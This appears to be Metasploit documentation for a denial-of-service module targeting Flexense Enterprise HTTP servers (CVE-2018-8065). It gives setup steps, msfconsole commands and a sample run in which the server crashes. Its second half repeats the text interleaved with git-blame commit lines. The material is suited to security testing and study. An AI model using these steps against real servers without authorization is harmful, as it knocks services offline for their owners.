documentation/modules/auxiliary/dos/http/flexense_http_server_dos.md

## Vulnerable Application

### Description

This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger
a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.

According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24
Following list of softwares are vulnerable to Denial Of Service.
read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065

DiskBoss Enterprise    <= v9.0.18
Sync Breeze Enterprise <= v10.6.24
Disk Pulse Enterprise  <= v10.6.24
Disk Savvy Enterprise  <= v10.6.24
Dup Scout Enterprise   <= v10.6.24
VX Search Enterprise   <= v10.6.24

**Vulnerable Application Link**
http://www.diskboss.com/downloads.html
http://www.syncbreeze.com/downloads.html
http://www.diskpulse.com/downloads.html
http://www.disksavvy.com/downloads.html
http://www.dupscout.com/downloads.html


### Installation Setup.

All Flexense applications that are listed above can be installed by following these steps.

Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe```

**And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard**

After the installation navigate to: ```Options->Server```

Check the box saying: ```Enable web server on port:...```

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use auxiliary/dos/http/flexense_http_server_dos`
  4. Do: `set rport <port>`
  5. Do: `set rhost <ip>`
  6. Do: `check`
```
[+] 192.168.1.20:80 The target is vulnerable.
```
  7. Do: `run`
  8. Web server will crash after 200-1000 request depending on the OS version and system memory.

## Scenarios

### WINDOWS 7/10

```
msf5 > use auxiliary/dos/http/flexense_http_server_dos 
msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27
rhost => 192.168.1.27
msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80
rport => 80
msf5 auxiliary(dos/http/flexense_http_server_dos) > run

[*] 192.168.1.20:80 - Triggering the vulnerability
[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down !
[*] Auxiliary module execution completed

```
fix install lines 2020-03-24 09:36:17 -04:00			`## Vulnerable Application`
Manual rewritten for flexense_http_server_dos 2018-05-25 20:18:54 +03:00
fix install lines 2020-03-24 09:36:17 -04:00			`### Description`

			`This module triggers a Denial of Service vulnerability in the Flexense Enterprise HTTP server. It is possible to trigger`
			`a write access memory vialation via rapidly sending HTTP requests with large HTTP header values.`
Manual rewritten for flexense_http_server_dos 2018-05-25 20:18:54 +03:00
			`According To publicly exploit Disclosure of Flexense HTTP Server v10.6.24`
			`Following list of softwares are vulnerable to Denial Of Service.`
			`read more : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8065`

			`DiskBoss Enterprise <= v9.0.18`
			`Sync Breeze Enterprise <= v10.6.24`
			`Disk Pulse Enterprise <= v10.6.24`
			`Disk Savvy Enterprise <= v10.6.24`
			`Dup Scout Enterprise <= v10.6.24`
			`VX Search Enterprise <= v10.6.24`

fix install lines 2020-03-24 09:36:17 -04:00			`Vulnerable Application Link`
Manual rewritten for flexense_http_server_dos 2018-05-25 20:18:54 +03:00			`http://www.diskboss.com/downloads.html`
			`http://www.syncbreeze.com/downloads.html`
			`http://www.diskpulse.com/downloads.html`
			`http://www.disksavvy.com/downloads.html`
			`http://www.dupscout.com/downloads.html`


fix install lines 2020-03-24 09:36:17 -04:00			`### Installation Setup.`

Manual rewritten for flexense_http_server_dos 2018-05-25 20:18:54 +03:00			`All Flexense applications that are listed above can be installed by following these steps.`

			Download Application : ```https://github.com/EgeBalci/Sync_Breeze_Enterprise_10_6_24_-DOS/raw/master/syncbreezeent_setup_v10.6.24.exe```

			`And Follow Sync Breeze Enterprise v10.6.24 Setup Wizard`

			After the installation navigate to: ```Options->Server```

			Check the box saying: ```Enable web server on port:...```

			`## Verification Steps`

			`1. Install the application`
			`2. Start msfconsole`
			3. Do: `use auxiliary/dos/http/flexense_http_server_dos`
			4. Do: `set rport <port>`
			5. Do: `set rhost <ip>`
			6. Do: `check`
			```
			`[+] 192.168.1.20:80 The target is vulnerable.`
			```
			7. Do: `run`
			`8. Web server will crash after 200-1000 request depending on the OS version and system memory.`

			`## Scenarios`
fix install lines 2020-03-24 09:36:17 -04:00
			`### WINDOWS 7/10`

Manual rewritten for flexense_http_server_dos 2018-05-25 20:18:54 +03:00			```
			`msf5 > use auxiliary/dos/http/flexense_http_server_dos`
			`msf5 auxiliary(dos/http/flexense_http_server_dos) > set rhost 192.168.1.27`
			`rhost => 192.168.1.27`
			`msf5 auxiliary(dos/http/flexense_http_server_dos) > set rport 80`
			`rport => 80`
			`msf5 auxiliary(dos/http/flexense_http_server_dos) > run`

			`[*] 192.168.1.20:80 - Triggering the vulnerability`
			`[+] 192.168.1.20:80 - DoS successful 192.168.1.20 is down !`
			`[*] Auxiliary module execution completed`

			```